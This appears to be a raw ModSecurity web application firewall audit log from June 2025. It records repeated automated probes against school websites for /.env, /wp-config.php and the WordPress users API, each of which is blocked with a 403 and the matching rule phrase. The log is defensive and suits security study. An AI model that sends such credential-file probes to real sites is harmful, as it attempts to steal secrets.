(KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --326a5468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --326a5468-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749578827553108 733 (- - -) Stopwatch2: 1749578827553108 733; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --326a5468-Z-- --63429c13-A-- [11/Jun/2025:01:10:11 +0700] aEh1AzQZgo88hy0TiYyF3AAAAFU 103.236.140.4 52732 103.236.140.4 8181 --63429c13-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 159.223.84.236 Accept-Encoding: gzip X-Varnish: 177787364 --63429c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --63429c13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749579011461241 751 (- - -) Stopwatch2: 1749579011461241 751; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63429c13-Z-- --3cd61f66-A-- [11/Jun/2025:01:10:11 +0700] aEh1A2kffiosQXBbxVaw3gAAAMk 103.236.140.4 52740 103.236.140.4 8181 --3cd61f66-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 159.223.84.236 Accept-Encoding: gzip X-Varnish: 177787367 --3cd61f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3cd61f66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749579011482505 692 (- - -) Stopwatch2: 1749579011482505 692; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cd61f66-Z-- --ce4f351b-A-- [11/Jun/2025:01:13:17 +0700] aEh1vWkffiosQXBbxVa43wAAAM0 103.236.140.4 41930 103.236.140.4 8181 --ce4f351b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) Accept-Charset: utf-8 --ce4f351b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce4f351b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749579197936393 651 (- - -) Stopwatch2: 1749579197936393 651; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce4f351b-Z-- --ab6e753d-A-- [11/Jun/2025:01:32:39 +0700] aEh6R2QJEkWdvAT5oU4wHwAAAAk 103.236.140.4 34376 103.236.140.4 8181 --ab6e753d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.161.40.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.161.40.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab6e753d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6e753d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749580359495222 2630 (- - -) Stopwatch2: 1749580359495222 2630; combined=1300, p1=424, p2=844, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6e753d-Z-- --5c80d03d-A-- [11/Jun/2025:01:51:49 +0700] aEh-xWkffiosQXBbxVb0nAAAAMw 103.236.140.4 32944 103.236.140.4 8181 --5c80d03d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 --5c80d03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c80d03d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581509838971 1052 (- - -) Stopwatch2: 1749581509838971 1052; combined=461, p1=387, p2=0, p3=0, p4=0, p5=74, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c80d03d-Z-- --02d8e355-A-- [11/Jun/2025:01:52:00 +0700] aEh-0DQZgo88hy0TiYyyLwAAAEo 103.236.140.4 34050 103.236.140.4 8181 --02d8e355-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --02d8e355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02d8e355-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581520962629 879 (- - -) Stopwatch2: 1749581520962629 879; combined=324, p1=288, p2=0, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02d8e355-Z-- --66207010-A-- [11/Jun/2025:01:52:54 +0700] aEh_BmkffiosQXBbxVb1_AAAAMs 103.236.140.4 39364 103.236.140.4 8181 --66207010-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Accept-Charset: utf-8 --66207010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66207010-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581574885627 907 (- - -) Stopwatch2: 1749581574885627 907; combined=315, p1=268, p2=0, p3=0, p4=0, p5=46, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66207010-Z-- --6f14a30a-A-- [11/Jun/2025:01:53:24 +0700] aEh_JGkffiosQXBbxVb2pwAAAMY 103.236.140.4 42162 103.236.140.4 8181 --6f14a30a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --6f14a30a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f14a30a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749581604136718 645 (- - -) Stopwatch2: 1749581604136718 645; combined=271, p1=238, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f14a30a-Z-- --d6fc0e29-A-- [11/Jun/2025:03:15:27 +0700] aEiSX2QJEkWdvAT5oU6JYgAAABM 103.236.140.4 56610 103.236.140.4 8181 --d6fc0e29-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.143.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.143.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d6fc0e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6fc0e29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749586527059404 922 (- - -) Stopwatch2: 1749586527059404 922; combined=335, p1=297, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6fc0e29-Z-- --fd790562-A-- [11/Jun/2025:03:35:33 +0700] aEiXFZKj8lJYHQZ0Enez6AAAAIM 103.236.140.4 44568 103.236.140.4 8181 --fd790562-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.102.151.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.102.151.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fd790562-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd790562-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749587733824713 3053 (- - -) Stopwatch2: 1749587733824713 3053; combined=1251, p1=414, p2=809, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd790562-Z-- --1553c736-A-- [11/Jun/2025:04:17:46 +0700] aEig-pKj8lJYHQZ0Ene0XAAAAIE 103.236.140.4 45060 103.236.140.4 8181 --1553c736-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.143.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.143.227 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1553c736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1553c736-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749590266924724 841 (- - -) Stopwatch2: 1749590266924724 841; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1553c736-Z-- --2096c923-A-- [11/Jun/2025:04:35:43 +0700] aEilL5Kj8lJYHQZ0Ene0dwAAAJg 103.236.140.4 45226 103.236.140.4 8181 --2096c923-B-- GET /wp-content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --2096c923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2096c923-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749591343435103 911 (- - -) Stopwatch2: 1749591343435103 911; combined=404, p1=364, p2=0, p3=0, p4=0, p5=40, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2096c923-Z-- --681d9051-A-- [11/Jun/2025:04:57:39 +0700] aEiqU5Kj8lJYHQZ0Ene46gAAAJE 103.236.140.4 38908 103.236.140.4 8181 --681d9051-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 178.128.207.138 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --681d9051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --681d9051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749592659567515 747 (- - -) Stopwatch2: 1749592659567515 747; combined=328, p1=294, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --681d9051-Z-- --2e474d51-A-- [11/Jun/2025:05:44:54 +0700] aEi1ZhdyUEEur5MGa-VFZAAAAME 103.236.140.4 36100 103.236.140.4 8181 --2e474d51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 Accept-Charset: utf-8 --2e474d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e474d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749595494906539 666 (- - -) Stopwatch2: 1749595494906539 666; combined=234, p1=205, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e474d51-Z-- --b755297e-A-- [11/Jun/2025:05:45:21 +0700] aEi1gWHSTY1pa5XXpU0nYAAAAEo 103.236.140.4 36110 103.236.140.4 8181 --b755297e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3722.400 QQBrowser/10.5.3763.400 Accept-Charset: utf-8 --b755297e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b755297e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749595521036158 947 (- - -) Stopwatch2: 1749595521036158 947; combined=390, p1=347, p2=0, p3=0, p4=0, p5=43, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b755297e-Z-- --2e81185b-A-- [11/Jun/2025:06:05:32 +0700] aEi6PJKj8lJYHQZ0EnfLHAAAAIk 103.236.140.4 36302 103.236.140.4 8181 --2e81185b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.200.24.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.200.24.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e81185b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e81185b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749596732856108 3751 (- - -) Stopwatch2: 1749596732856108 3751; combined=1450, p1=506, p2=906, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e81185b-Z-- --c824ce00-A-- [11/Jun/2025:06:31:24 +0700] aEjATBdyUEEur5MGa-VFiAAAANU 103.236.140.4 36576 103.236.140.4 8181 --c824ce00-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.88.170.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.88.170.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975U1 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --c824ce00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c824ce00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749598284211974 754 (- - -) Stopwatch2: 1749598284211974 754; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c824ce00-Z-- --c6d9293b-A-- [11/Jun/2025:06:31:27 +0700] aEjAT5Kj8lJYHQZ0EnfLJwAAAII 103.236.140.4 36578 103.236.140.4 8181 --c6d9293b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.88.170.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.88.170.48 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49 Accept-Charset: utf-8 --c6d9293b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6d9293b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749598287969296 829 (- - -) Stopwatch2: 1749598287969296 829; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 